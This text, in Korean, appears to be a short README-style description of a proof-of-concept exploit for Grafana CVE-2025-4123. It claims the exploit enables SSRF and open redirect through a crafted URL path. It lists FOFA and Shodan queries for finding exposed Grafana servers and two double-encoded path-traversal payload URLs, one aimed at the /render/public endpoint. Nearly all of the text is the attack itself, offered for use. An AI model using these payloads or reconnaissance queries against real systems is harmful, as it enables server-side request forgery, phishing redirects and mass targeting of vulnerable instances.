
Grafana CVE-2025-4123에 대한 개념 증명 익스플로잇으로, 조작된 URL 경로를 통해 SSRF 및 오픈 리다이렉트 공격을 가능하게 합니다. Shodan 및 FOFA에 대한 정찰 쿼리를 포함합니다.
FOFA app="Grafana"
Shodan product:"Grafana (Open Source)"
http://localhost:3000/render/public/..%252f%255C{{OpenRedirectURL}}%252f%253F%252f..%252f..
/public/..%2F%5c{website.com}%2F%3f%2F..%2F..